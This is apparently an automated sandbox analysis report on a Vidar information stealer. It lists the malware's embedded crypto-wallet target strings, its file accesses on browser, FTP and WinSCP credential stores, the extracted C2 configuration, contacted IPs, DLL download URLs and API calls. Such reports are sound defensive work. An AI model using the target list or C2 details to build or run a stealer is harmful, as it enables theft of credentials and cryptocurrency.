Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC50C40 sqlite3_bind_zeroblob,	3_2_6CC50C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC50D60 sqlite3_bind_parameter_name,	3_2_6CC50D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB78EA0 sqlite3_clear_bindings,	3_2_6CB78EA0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
49.12.197.9	unknown	Germany	24940	HETZNER-ASDE	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false

Contacted Domains

Name	IP	Active
steamcommunity.com	104.102.49.254	true

Contacted URLs

Name	Malicious	Reputation
https://49.12.197.9/	true	unknown
https://49.12.197.9/freebl3.dll	true	unknown
https://49.12.197.9/sqlp.dll	true	unknown
https://49.12.197.9/softokn3.dll	true	unknown
https://49.12.197.9/vcruntime140.dll	true	unknown
https://49.12.197.9/nss3.dll	true	unknown
https://49.12.197.9/mozglue.dll	true	unknown

AV Detection

Found malware configuration

Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 30%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\msvcp110.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_02A080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A08048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_02A08048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A11E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_02A11E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0A7D8 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,	3_2_02A0A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CA76C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D38ED FindFirstFileExW,	0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_02A15B0B
